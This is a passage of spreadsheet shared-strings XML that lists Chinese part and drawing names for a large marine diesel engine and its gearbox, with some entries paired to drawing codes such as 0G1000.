    <t xml:space="preserve">十字头导板液压拉伸器                                        </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴上的V型环                                          </t>
  </si>
  <si>
    <t xml:space="preserve">维修                                                </t>
  </si>
  <si>
    <t xml:space="preserve">气缸体空气进口                                           </t>
  </si>
  <si>
    <t xml:space="preserve">冷却水套外形                                            </t>
  </si>
  <si>
    <t xml:space="preserve">气缸体外形                                             </t>
  </si>
  <si>
    <t xml:space="preserve">缸套外形                                              </t>
  </si>
  <si>
    <t xml:space="preserve">缸套磨损测量                                            </t>
  </si>
  <si>
    <t xml:space="preserve">模板-气缸套                                            </t>
  </si>
  <si>
    <t xml:space="preserve">检查报告                                              </t>
  </si>
  <si>
    <t xml:space="preserve">启动阀衬套组件                                           </t>
  </si>
  <si>
    <t xml:space="preserve">测试机缸盖                                             </t>
  </si>
  <si>
    <t xml:space="preserve">缸盖外形                                              </t>
  </si>
  <si>
    <t xml:space="preserve">缸盖模板                                              </t>
  </si>
  <si>
    <t xml:space="preserve">焊接曲轴超声波检查                                         </t>
  </si>
  <si>
    <t xml:space="preserve">认可图                                               </t>
  </si>
  <si>
    <t xml:space="preserve">法兰夹箍                                              </t>
  </si>
  <si>
    <t xml:space="preserve">曲拐质量控制+生产规范                                       </t>
  </si>
  <si>
    <t xml:space="preserve">包装                                                </t>
  </si>
  <si>
    <t xml:space="preserve">运动部件重量数据                                          </t>
  </si>
  <si>
    <t xml:space="preserve">进油口与出油口                                           </t>
  </si>
  <si>
    <t xml:space="preserve">连杆螺栓用螺母                                           </t>
  </si>
  <si>
    <t xml:space="preserve">提升杆                                               </t>
  </si>
  <si>
    <t xml:space="preserve">连杆提升工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">连杆液压拉伸器                                           </t>
  </si>
  <si>
    <t xml:space="preserve">安全夹箍                                              </t>
  </si>
  <si>
    <t xml:space="preserve">填料函导板                                             </t>
  </si>
  <si>
    <t xml:space="preserve">液压拉伸工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">夹具                                                </t>
  </si>
  <si>
    <t xml:space="preserve">十字头导轨                                             </t>
  </si>
  <si>
    <t xml:space="preserve">活塞头毛坯                                             </t>
  </si>
  <si>
    <t xml:space="preserve">C8活塞环质量控制规范                                       </t>
  </si>
  <si>
    <t xml:space="preserve">活塞总成                                              </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器芯子                                             </t>
  </si>
  <si>
    <t xml:space="preserve">活塞裙尺寸检查                                           </t>
  </si>
  <si>
    <t xml:space="preserve">活塞运动                                              </t>
  </si>
  <si>
    <t xml:space="preserve">活塞裙质量说明                                           </t>
  </si>
  <si>
    <t xml:space="preserve">起模板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">活塞液压工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">活塞冷却出口                                            </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀壳体+阀杆                                          </t>
  </si>
  <si>
    <t xml:space="preserve">火焰防护装置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">弹簧座详细资料                                           </t>
  </si>
  <si>
    <t xml:space="preserve">密封环布置                                             </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀外形图                                            </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀螺母拧紧规格                                         </t>
  </si>
  <si>
    <t xml:space="preserve">拔取工具                                              </t>
  </si>
  <si>
    <t xml:space="preserve">KAIS阀模板                                           </t>
  </si>
  <si>
    <t xml:space="preserve">各种燃油阀                                             </t>
  </si>
  <si>
    <t xml:space="preserve">操纵                                                </t>
  </si>
  <si>
    <t xml:space="preserve">摇臂                                                </t>
  </si>
  <si>
    <t xml:space="preserve">顶杆                                                </t>
  </si>
  <si>
    <t xml:space="preserve">扳手架                                               </t>
  </si>
  <si>
    <t xml:space="preserve">滚轮导筒外壳更换                                          </t>
  </si>
  <si>
    <t xml:space="preserve">轴承和衬套布置                                           </t>
  </si>
  <si>
    <t xml:space="preserve">红套工具-选择                                           </t>
  </si>
  <si>
    <t xml:space="preserve">嵌入式密封环                                            </t>
  </si>
  <si>
    <t xml:space="preserve">有关V型环的信息                                          </t>
  </si>
  <si>
    <t xml:space="preserve">齿轮箱简图                                             </t>
  </si>
  <si>
    <t xml:space="preserve">换向机构                                              </t>
  </si>
  <si>
    <t xml:space="preserve">齿轮传动机构布置                                          </t>
  </si>
  <si>
    <t xml:space="preserve">液压马达                                              </t>
  </si>
  <si>
    <t xml:space="preserve">空气分配传动                                            </t>
  </si>
  <si>
    <t xml:space="preserve">滚轮锁变更                                             </t>
  </si>
  <si>
    <t xml:space="preserve">用于MS-103工具                                        </t>
  </si>
  <si>
    <t xml:space="preserve">工具-换向机构                                           </t>
  </si>
  <si>
    <t xml:space="preserve">仪表焊接座                                             </t>
  </si>
  <si>
    <t xml:space="preserve">热感应配件                                             </t>
  </si>
  <si>
    <t xml:space="preserve">水压力计                                              </t>
  </si>
  <si>
    <t xml:space="preserve">振动报警.涡轮增压器                                        </t>
  </si>
  <si>
    <t xml:space="preserve">弹簧垫圈                                              </t>
  </si>
  <si>
    <t xml:space="preserve">多样的                                               </t>
  </si>
  <si>
    <t xml:space="preserve">侧板                                                </t>
  </si>
  <si>
    <t xml:space="preserve">比较器布置                                             </t>
  </si>
  <si>
    <t xml:space="preserve">测试板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">燃油泵总成                                             </t>
  </si>
  <si>
    <t xml:space="preserve">转速控制系统                                            </t>
  </si>
  <si>
    <t xml:space="preserve">操纵布置                                              </t>
  </si>
  <si>
    <t xml:space="preserve">正时测量-制动缸                                          </t>
  </si>
  <si>
    <t xml:space="preserve">调速器支架                                             </t>
  </si>
  <si>
    <t xml:space="preserve">空气缸布置                                             </t>
  </si>
  <si>
    <t xml:space="preserve">安装点                                               </t>
  </si>
  <si>
    <t xml:space="preserve">空气定位器布置                                           </t>
  </si>
  <si>
    <t xml:space="preserve">停止活塞阀                                             </t>
  </si>
  <si>
    <t xml:space="preserve">启动空气消音器                                           </t>
  </si>
  <si>
    <t xml:space="preserve">铸钢维修说明                                            </t>
  </si>
  <si>
    <t xml:space="preserve">气缸支架                                              </t>
  </si>
  <si>
    <t xml:space="preserve">增压器排气管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">PTO支架                                             </t>
  </si>
  <si>
    <t xml:space="preserve">力矩平衡器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">调速器规格                                             </t>
  </si>
  <si>
    <t xml:space="preserve">扫气集管更改                                            </t>
  </si>
  <si>
    <t xml:space="preserve">挡板                                                </t>
  </si>
  <si>
    <t xml:space="preserve">入口                                                </t>
  </si>
  <si>
    <t xml:space="preserve">中间接管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">天圆地方                                              </t>
  </si>
  <si>
    <t xml:space="preserve">绝缘体                                               </t>
  </si>
  <si>
    <t xml:space="preserve">隔音材料                                              </t>
  </si>
  <si>
    <t xml:space="preserve">紧急鼓风机布置                                           </t>
  </si>
  <si>
    <t xml:space="preserve">电路板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">减振器布置                                             </t>
  </si>
  <si>
    <t xml:space="preserve">减振器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">吸气管布置                                             </t>
  </si>
  <si>
    <t xml:space="preserve">入口箱                                               </t>
  </si>
  <si>
    <t xml:space="preserve">冷却器箱                                              </t>
  </si>
  <si>
    <t xml:space="preserve">调速器57规格                                           </t>
  </si>
  <si>
    <t xml:space="preserve">螺栓连接的排气阀管                                         </t>
  </si>
  <si>
    <t xml:space="preserve">温度测量                                              </t>
  </si>
  <si>
    <t xml:space="preserve">螺栓连接的排气阀弯头                                        </t>
  </si>
  <si>
    <t xml:space="preserve">夹箍连接的排气阀弯头                                        </t>
  </si>
  <si>
    <t xml:space="preserve">螺栓连接的支管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">中间接管-螺栓连接                                         </t>
  </si>
  <si>
    <t xml:space="preserve">增压器横向管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">T型管上端螺栓连接                                         </t>
  </si>
  <si>
    <t xml:space="preserve">T型管下端螺栓连接                                         </t>
  </si>
  <si>
    <t xml:space="preserve">T型管下端夹具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">增压器支架螺栓连接                                         </t>
  </si>
  <si>
    <t xml:space="preserve">格栅螺栓连接固定器                                         </t>
  </si>
  <si>
    <t xml:space="preserve">格栅装配                                              </t>
  </si>
  <si>
    <t xml:space="preserve">零件列表-出口管                                          </t>
  </si>
  <si>
    <t xml:space="preserve">排气管布置                                             </t>
  </si>
  <si>
    <t xml:space="preserve">栅格处绝缘                                             </t>
  </si>
  <si>
    <t xml:space="preserve">出口管绝缘                                             </t>
  </si>
  <si>
    <t xml:space="preserve">出口管布置                                             </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀出口管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">排气管补充                                             </t>
  </si>
  <si>
    <t xml:space="preserve">排气集管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">排气出口管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">增压器安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">排气集管各种详述                                          </t>
  </si>
  <si>
    <t xml:space="preserve">L-GFC消音器列表                                        </t>
  </si>
  <si>
    <t xml:space="preserve">清洗喷嘴                                              </t>
  </si>
  <si>
    <t xml:space="preserve">格栅拆除                                              </t>
  </si>
  <si>
    <t xml:space="preserve">扭振减振器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">空气起动器安装                                           </t>
  </si>
  <si>
    <t xml:space="preserve">燃油双滤器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">液压推力工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">液压螺母                                              </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油滤器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油板式冷却器                                          </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油泵总成                                            </t>
  </si>
  <si>
    <t xml:space="preserve">压力调节器安装                                           </t>
  </si>
  <si>
    <t xml:space="preserve">淡水冷却泵                                             </t>
  </si>
  <si>
    <t xml:space="preserve">涡轮增压器和空冷器列表                                       </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器布置                                             </t>
  </si>
  <si>
    <t xml:space="preserve">夹箍连接的进气管                                          </t>
  </si>
  <si>
    <t xml:space="preserve">增压器润滑布置                                           </t>
  </si>
  <si>
    <t xml:space="preserve">涡轮增压器布置                                           </t>
  </si>
  <si>
    <t xml:space="preserve">低负荷阀                                              </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器化学清洗说明                                         </t>
  </si>
  <si>
    <t xml:space="preserve">清洗工具布置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">化学清洗布置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">罗茨鼓风机转子                                           </t>
  </si>
  <si>
    <t xml:space="preserve">草图                                                </t>
  </si>
  <si>
    <t xml:space="preserve">中层托架                                              </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮侧中层托架                                           </t>
  </si>
  <si>
    <t xml:space="preserve">平台支架                                              </t>
  </si>
  <si>
    <t xml:space="preserve">特殊部件布置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">涡轮增压器底座                                           </t>
  </si>
  <si>
    <t xml:space="preserve">专用底座                                              </t>
  </si>
  <si>
    <t xml:space="preserve">排气集管底座                                            </t>
  </si>
  <si>
    <t xml:space="preserve">涡轮增压器/空冷器底座                                       </t>
  </si>
  <si>
    <t xml:space="preserve">专用支撑                                              </t>
  </si>
  <si>
    <t xml:space="preserve">上部平台排气侧                                           </t>
  </si>
  <si>
    <t xml:space="preserve">扫气集管处平台                                           </t>
  </si>
  <si>
    <t xml:space="preserve">链壳处梯子                                             </t>
  </si>
  <si>
    <t xml:space="preserve">平台布置-前端                                           </t>
  </si>
  <si>
    <t xml:space="preserve">排气侧托架布置                                           </t>
  </si>
  <si>
    <t xml:space="preserve">前端支架布置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">顶部格栅布置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">推力轴                                               </t>
  </si>
  <si>
    <t xml:space="preserve">外部管子清单                                            </t>
  </si>
  <si>
    <t xml:space="preserve">各式管子-A或B面                                         </t>
  </si>
  <si>
    <t xml:space="preserve">三通管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">草图-冷却燃油阀                                          </t>
  </si>
  <si>
    <t xml:space="preserve">高压燃油弯管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">控制侧格栅管系                                           </t>
  </si>
  <si>
    <t xml:space="preserve">增压器滑油出口                                           </t>
  </si>
  <si>
    <t xml:space="preserve">增压器润滑油管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油分配管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">增压器密封空气                                           </t>
  </si>
  <si>
    <t xml:space="preserve">淡水总管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">淡水管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">透气箱                                               </t>
  </si>
  <si>
    <t xml:space="preserve">盐水泄放管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">柴油机进口淡水泵                                          </t>
  </si>
  <si>
    <t xml:space="preserve">球阀                                                </t>
  </si>
  <si>
    <t xml:space="preserve">非正确制造工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">前顶部提升工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">后顶部提升工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">机架前端提升                                            </t>
  </si>
  <si>
    <t xml:space="preserve">机架后端提升                                            </t>
  </si>
  <si>
    <t xml:space="preserve">提升机座排气曲轴前端                                        </t>
  </si>
  <si>
    <t xml:space="preserve">提升机座排气曲轴后端                                        </t>
  </si>
  <si>
    <t xml:space="preserve">提升机座+曲轴前端                                         </t>
  </si>
  <si>
    <t xml:space="preserve">提升机座+曲轴后端                                         </t>
  </si>
  <si>
    <t xml:space="preserve">提升-曲轴总成                                           </t>
  </si>
  <si>
    <t xml:space="preserve">提升-曲轴前端                                           </t>
  </si>
  <si>
    <t xml:space="preserve">提升-曲轴后端                                           </t>
  </si>
  <si>
    <t xml:space="preserve">液压工具                                              </t>
  </si>
  <si>
    <t xml:space="preserve">手动工具                                              </t>
  </si>
  <si>
    <t xml:space="preserve">905工具                                             </t>
  </si>
  <si>
    <t xml:space="preserve">909工具                                             </t>
  </si>
  <si>
    <t xml:space="preserve">910工具                                             </t>
  </si>
  <si>
    <t xml:space="preserve">914工具                                             </t>
  </si>
  <si>
    <t xml:space="preserve">压力泵测试规范                                           </t>
  </si>
  <si>
    <t xml:space="preserve">启动空气集管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">振动偏移曲线                                            </t>
  </si>
  <si>
    <t xml:space="preserve">顶部拉撑布置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">液压顶撑                                              </t>
  </si>
  <si>
    <t xml:space="preserve">振动补偿器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">旋转补偿器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">线性补偿器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">机内                                                </t>
  </si>
  <si>
    <t xml:space="preserve">毛坯重量                                              </t>
  </si>
  <si>
    <t xml:space="preserve">气缸盖质量规范                                           </t>
  </si>
  <si>
    <t xml:space="preserve">试车台                                               </t>
  </si>
  <si>
    <t xml:space="preserve">涡轮增压器总成                                           </t>
  </si>
  <si>
    <t xml:space="preserve">前转子草图                                             </t>
  </si>
  <si>
    <t xml:space="preserve">扩压叶轮-简图                                           </t>
  </si>
  <si>
    <t xml:space="preserve">扩压器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">喷嘴装配总成                                            </t>
  </si>
  <si>
    <t xml:space="preserve">涡轮入口                                              </t>
  </si>
  <si>
    <t xml:space="preserve">压缩机进口                                             </t>
  </si>
  <si>
    <t xml:space="preserve">性能曲线                                              </t>
  </si>
  <si>
    <t xml:space="preserve">增压器效率                                             </t>
  </si>
  <si>
    <t xml:space="preserve">扫气空气冷却器尺寸                                         </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器外形                                             </t>
  </si>
  <si>
    <t xml:space="preserve">装配图                                               </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器组件                                             </t>
  </si>
  <si>
    <t xml:space="preserve">冷却器清洗                                             </t>
  </si>
  <si>
    <t xml:space="preserve">柴油机总成起吊                                           </t>
  </si>
  <si>
    <t xml:space="preserve">启动空气分配器布置                                         </t>
  </si>
  <si>
    <t xml:space="preserve">二氧化碳灭火系统主管                                        </t>
  </si>
  <si>
    <t xml:space="preserve">机架支撑的位置                                           </t>
  </si>
  <si>
    <t xml:space="preserve">机架在机座上的位置                                         </t>
  </si>
  <si>
    <t xml:space="preserve">小孔支架清单                                            </t>
  </si>
  <si>
    <t xml:space="preserve">管尺寸列表                                             </t>
  </si>
  <si>
    <t xml:space="preserve">法兰螺钉长度                                            </t>
  </si>
  <si>
    <t xml:space="preserve">插座等用的钻孔                                           </t>
  </si>
  <si>
    <t xml:space="preserve">管长                                                </t>
  </si>
  <si>
    <t xml:space="preserve">零件标准库清单                                           </t>
  </si>
  <si>
    <t xml:space="preserve">测量点描述                                             </t>
  </si>
  <si>
    <t xml:space="preserve">剖面图                                               </t>
  </si>
  <si>
    <t>0G0000</t>
  </si>
  <si>
    <t xml:space="preserve">剖面图-PTO                                           </t>
  </si>
  <si>
    <t>0G0001</t>
  </si>
  <si>
    <t xml:space="preserve">剖面图-PTO位于前端                                       </t>
  </si>
  <si>
    <t>0G0002</t>
  </si>
  <si>
    <t xml:space="preserve">剖面图-PTO位于后端                                       </t>
  </si>
  <si>
    <t>0G0003</t>
  </si>
  <si>
    <t xml:space="preserve">安装图                                               </t>
  </si>
  <si>
    <t>0G0020</t>
  </si>
  <si>
    <t xml:space="preserve">安装图-PTO                                           </t>
  </si>
  <si>
    <t>0G0021</t>
  </si>
  <si>
    <t xml:space="preserve">安装图-PTO位于前端                                       </t>
  </si>
  <si>
    <t>0G0022</t>
  </si>
  <si>
    <t xml:space="preserve">安装图-PTO位于后端                                       </t>
  </si>
  <si>
    <t>0G0023</t>
  </si>
  <si>
    <t xml:space="preserve">尺寸图                                               </t>
  </si>
  <si>
    <t>0G0040</t>
  </si>
  <si>
    <t xml:space="preserve">PTO尺寸图                                            </t>
  </si>
  <si>
    <t>0G0041</t>
  </si>
  <si>
    <t xml:space="preserve">PTO位于前端尺寸图                                        </t>
  </si>
  <si>
    <t>0G0042</t>
  </si>
  <si>
    <t xml:space="preserve">PTO位于后端尺寸图                                        </t>
  </si>
  <si>
    <t>0G0043</t>
  </si>
  <si>
    <t xml:space="preserve">推力法兰尺寸图                                           </t>
  </si>
  <si>
    <t>0G0049</t>
  </si>
  <si>
    <t xml:space="preserve">环氧垫块基座图                                           </t>
  </si>
  <si>
    <t>0G0060</t>
  </si>
  <si>
    <t xml:space="preserve">钢垫块基座图                                            </t>
  </si>
  <si>
    <t>0G0062</t>
  </si>
  <si>
    <t xml:space="preserve">地脚螺栓                                              </t>
  </si>
  <si>
    <t>0G0066</t>
  </si>
  <si>
    <t xml:space="preserve">地脚调节螺栓                                            </t>
  </si>
  <si>
    <t>0G0067</t>
  </si>
  <si>
    <t xml:space="preserve">测试台基座综述                                           </t>
  </si>
  <si>
    <t>0G0069</t>
  </si>
  <si>
    <t xml:space="preserve">端锲块                                               </t>
  </si>
  <si>
    <t>0G0070</t>
  </si>
  <si>
    <t xml:space="preserve">侧锲块                                               </t>
  </si>
  <si>
    <t>0G0071</t>
  </si>
  <si>
    <t xml:space="preserve">锲块板                                               </t>
  </si>
  <si>
    <t>0G0073</t>
  </si>
  <si>
    <t xml:space="preserve">锲块支撑                                              </t>
  </si>
  <si>
    <t>0G0074</t>
  </si>
  <si>
    <t xml:space="preserve">锲块键                                               </t>
  </si>
  <si>
    <t>0G0075</t>
  </si>
  <si>
    <t xml:space="preserve">齿轮供油图                                             </t>
  </si>
  <si>
    <t>0G0090</t>
  </si>
  <si>
    <t xml:space="preserve">系统供油图                                             </t>
  </si>
  <si>
    <t>0G0092</t>
  </si>
  <si>
    <t xml:space="preserve">技术数据                                              </t>
  </si>
  <si>
    <t>0G0100</t>
  </si>
  <si>
    <t xml:space="preserve">螺栓上紧数据                                            </t>
  </si>
  <si>
    <t>0G0102</t>
  </si>
  <si>
    <t xml:space="preserve">公差数值                                              </t>
  </si>
  <si>
    <t>0G0104</t>
  </si>
  <si>
    <t xml:space="preserve">键-键槽联接                                            </t>
  </si>
  <si>
    <t>0G0106</t>
  </si>
  <si>
    <t xml:space="preserve">锥体拉伸距离                                            </t>
  </si>
  <si>
    <t>0G0108</t>
  </si>
  <si>
    <t xml:space="preserve">用于连接的过盈毂                                          </t>
  </si>
  <si>
    <t>0G0110</t>
  </si>
  <si>
    <t xml:space="preserve">轴承布置                                              </t>
  </si>
  <si>
    <t>0G0112</t>
  </si>
  <si>
    <t xml:space="preserve">油漆规格-内部部件                                         </t>
  </si>
  <si>
    <t>0G0130</t>
  </si>
  <si>
    <t xml:space="preserve">油漆规格-外部部件                                         </t>
  </si>
  <si>
    <t>0G0131</t>
  </si>
  <si>
    <t xml:space="preserve">管子清洗                                              </t>
  </si>
  <si>
    <t>0G0134</t>
  </si>
  <si>
    <t xml:space="preserve">检验形式-齿轮装配                                         </t>
  </si>
  <si>
    <t>0G0150</t>
  </si>
  <si>
    <t xml:space="preserve">检验形式-PTO装配                                        </t>
  </si>
  <si>
    <t>0G0152</t>
  </si>
  <si>
    <t xml:space="preserve">检验形式-Geislinger联轴器                                </t>
  </si>
  <si>
    <t>0G0154</t>
  </si>
  <si>
    <t xml:space="preserve">检验-机带齿轮                                           </t>
  </si>
  <si>
    <t>0G0160</t>
  </si>
  <si>
    <t xml:space="preserve">检验-齿轮单独                                           </t>
  </si>
  <si>
    <t>0G0161</t>
  </si>
  <si>
    <t xml:space="preserve">检验形式-齿轮数据                                         </t>
  </si>
  <si>
    <t>0G0163</t>
  </si>
  <si>
    <t xml:space="preserve">带PTO齿轮标记                                          </t>
  </si>
  <si>
    <t>0G0200</t>
  </si>
  <si>
    <t xml:space="preserve">不带PTO齿轮标记                                         </t>
  </si>
  <si>
    <t>0G0201</t>
  </si>
  <si>
    <t xml:space="preserve">齿轮标记                                              </t>
  </si>
  <si>
    <t>0G0203</t>
  </si>
  <si>
    <t xml:space="preserve">PTO标记                                             </t>
  </si>
  <si>
    <t>0G0204</t>
  </si>
  <si>
    <t xml:space="preserve">箭头-旋转方向                                           </t>
  </si>
  <si>
    <t>0G0206</t>
  </si>
  <si>
    <t xml:space="preserve">位置传感器标签                                           </t>
  </si>
  <si>
    <t>0G0280</t>
  </si>
  <si>
    <t xml:space="preserve">带离合器FLEXSTAR截面                                    </t>
  </si>
  <si>
    <t>0G0900</t>
  </si>
  <si>
    <t xml:space="preserve">不带离合器FLEXSTAR截面                                   </t>
  </si>
  <si>
    <t>0G0901</t>
  </si>
  <si>
    <t xml:space="preserve">PTO-FLEXSTAR数据                                    </t>
  </si>
  <si>
    <t>0G0930</t>
  </si>
  <si>
    <t xml:space="preserve">FLEXSTAR额外加工                                      </t>
  </si>
  <si>
    <t>0G0934</t>
  </si>
  <si>
    <t xml:space="preserve">Testskema-Flexstar安装                              </t>
  </si>
  <si>
    <t>0G0950</t>
  </si>
  <si>
    <t xml:space="preserve">FLEXSTAR标志                                        </t>
  </si>
  <si>
    <t>0G0970</t>
  </si>
  <si>
    <t xml:space="preserve">过盈齿轮箱总成                                           </t>
  </si>
  <si>
    <t>0G1000</t>
  </si>
  <si>
    <t xml:space="preserve">过盈齿轮箱                                             </t>
  </si>
  <si>
    <t>0G1002</t>
  </si>
  <si>
    <t xml:space="preserve">齿轮箱下部                                             </t>
  </si>
  <si>
    <t>0G1020</t>
  </si>
  <si>
    <t xml:space="preserve">齿轮箱下部铸件                                           </t>
  </si>
  <si>
    <t>0G1021</t>
  </si>
  <si>
    <t xml:space="preserve">齿轮箱中间部分                                           </t>
  </si>
  <si>
    <t>0G1023</t>
  </si>
  <si>
    <t xml:space="preserve">齿轮箱中间部分铸件                                         </t>
  </si>
  <si>
    <t>0G1024</t>
  </si>
  <si>
    <t xml:space="preserve">齿轮箱上部                                             </t>
  </si>
  <si>
    <t>0G1026</t>
  </si>
  <si>
    <t xml:space="preserve">齿轮箱上部铸件                                           </t>
  </si>
  <si>
    <t>0G1027</t>
  </si>
  <si>
    <t xml:space="preserve">齿轮箱，上部                                            </t>
  </si>
  <si>
    <t>0G1030</t>
  </si>
  <si>
    <t xml:space="preserve">齿轮箱，上部铸                                           </t>
  </si>
  <si>
    <t>0G1031</t>
  </si>
  <si>
    <t xml:space="preserve">齿轮箱盖帽                                             </t>
  </si>
  <si>
    <t>0G1033</t>
  </si>
  <si>
    <t xml:space="preserve">齿轮箱盖铸件                                            </t>
  </si>
  <si>
    <t>0G1034</t>
  </si>
  <si>
    <t xml:space="preserve">推力轴承架总成                                           </t>
  </si>
  <si>
    <t>0G1050</t>
  </si>
  <si>
    <t xml:space="preserve">推力轴承架下部                                           </t>
  </si>
  <si>
    <t>0G1052</t>
  </si>
  <si>
    <t xml:space="preserve">推力轴承架下部铸件                                         </t>
  </si>
  <si>
    <t>0G1053</t>
  </si>
  <si>
    <t xml:space="preserve">推力轴承架上部                                           </t>
  </si>
  <si>
    <t>0G1054</t>
  </si>
  <si>
    <t xml:space="preserve">推力轴承架上部铸件                                         </t>
  </si>
  <si>
    <t>0G1055</t>
  </si>
  <si>
    <t xml:space="preserve">推力轴承盖总成                                           </t>
  </si>
  <si>
    <t>0G1057</t>
  </si>
  <si>
    <t xml:space="preserve">推力轴承盖下部铸件                                         </t>
  </si>
  <si>
    <t>0G1058</t>
  </si>
  <si>
    <t xml:space="preserve">推力轴承盖上部铸件                                         </t>
  </si>
  <si>
    <t>0G1059</t>
  </si>
  <si>
    <t xml:space="preserve">密封架总成                                             </t>
  </si>
  <si>
    <t>0G1060</t>
  </si>
  <si>
    <t xml:space="preserve">密封架下部                                             </t>
  </si>
  <si>
    <t>0G1062</t>
  </si>
  <si>
    <t xml:space="preserve">密封架下部铸件                                           </t>
  </si>
  <si>
    <t>0G1063</t>
  </si>
  <si>
    <t xml:space="preserve">密封架上部                                             </t>
  </si>
  <si>
    <t>0G1064</t>
  </si>
  <si>
    <t xml:space="preserve">密封架上部铸件                                           </t>
  </si>
  <si>
    <t>0G1065</t>
  </si>
  <si>
    <t xml:space="preserve">轴承座-前端                                            </t>
  </si>
  <si>
    <t>0G1080</t>
  </si>
  <si>
    <t xml:space="preserve">轴承座-后端                                            </t>
  </si>
  <si>
    <t>0G1081</t>
  </si>
  <si>
    <t xml:space="preserve">轴承座                                               </t>
  </si>
  <si>
    <t>0G1082</t>
  </si>
  <si>
    <t xml:space="preserve">轴承座铸件                                             </t>
  </si>
  <si>
    <t>0G1083</t>
  </si>
  <si>
    <t xml:space="preserve">轴承盖前端                                             </t>
  </si>
  <si>
    <t>0G1084</t>
  </si>
  <si>
    <t xml:space="preserve">轴承盖后端                                             </t>
  </si>
  <si>
    <t>0G1085</t>
  </si>
  <si>
    <t xml:space="preserve">轴承盖铸件                                             </t>
  </si>
  <si>
    <t>0G1086</t>
  </si>
  <si>
    <t xml:space="preserve">齿轮轴承                                              </t>
  </si>
  <si>
    <t>0G1100</t>
  </si>
  <si>
    <t>0G1102</t>
  </si>
  <si>
    <t xml:space="preserve">推力轴承                                              </t>
  </si>
  <si>
    <t>0G1120</t>
  </si>
  <si>
    <t xml:space="preserve">推力块                                               </t>
  </si>
  <si>
    <t>0G1122</t>
  </si>
  <si>
    <t xml:space="preserve">推力块的支撑环                                           </t>
  </si>
  <si>
    <t>0G1123</t>
  </si>
  <si>
    <t xml:space="preserve">推力块的支撑板                                           </t>
  </si>
  <si>
    <t>0G1124</t>
  </si>
  <si>
    <t xml:space="preserve">推力垫圈                                              </t>
  </si>
  <si>
    <t>0G1125</t>
  </si>
  <si>
    <t xml:space="preserve">推力垫圈锁紧环                                           </t>
  </si>
  <si>
    <t>0G1126</t>
  </si>
  <si>
    <t>0G1140</t>
  </si>
  <si>
    <t xml:space="preserve">导向轴承                                              </t>
  </si>
  <si>
    <t>0G1142</t>
  </si>
  <si>
    <t xml:space="preserve">轴承锁紧垫圈                                            </t>
  </si>
  <si>
    <t>0G1149</t>
  </si>
  <si>
    <t xml:space="preserve">齿轮箱盖                                              </t>
  </si>
  <si>
    <t>0G1200</t>
  </si>
  <si>
    <t xml:space="preserve">前端盖                                               </t>
  </si>
  <si>
    <t>0G1210</t>
  </si>
  <si>
    <t xml:space="preserve">前端后端盖                                             </t>
  </si>
  <si>
    <t>0G1212</t>
  </si>
  <si>
    <t xml:space="preserve">前端维修盖                                             </t>
  </si>
  <si>
    <t>0G1214</t>
  </si>
  <si>
    <t xml:space="preserve">位置传感器盖                                            </t>
  </si>
  <si>
    <t>0G1216</t>
  </si>
  <si>
    <t xml:space="preserve">PTO前端盖                                            </t>
  </si>
  <si>
    <t>0G1218</t>
  </si>
  <si>
    <t xml:space="preserve">后端盖                                               </t>
  </si>
  <si>
    <t>0G1220</t>
  </si>
  <si>
    <t xml:space="preserve">尾端后端盖                                             </t>
  </si>
  <si>
    <t>0G1222</t>
  </si>
  <si>
    <t xml:space="preserve">密封底座盖                                             </t>
  </si>
  <si>
    <t>0G1224</t>
  </si>
  <si>
    <t xml:space="preserve">PTO后端盖                                            </t>
  </si>
  <si>
    <t>0G1228</t>
  </si>
  <si>
    <t xml:space="preserve">侧盖                                                </t>
  </si>
  <si>
    <t>0G1230</t>
  </si>
